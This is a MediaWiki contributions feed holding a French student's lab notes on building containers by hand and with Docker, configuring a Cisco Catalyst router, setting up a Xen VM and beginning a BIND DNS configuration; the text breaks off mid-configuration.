<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Jdupont3</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Jdupont3"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Jdupont3"/>
		<updated>2026-05-13T22:09:26Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49114</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49114"/>
				<updated>2018-12-21T15:44:37Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Réalisation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
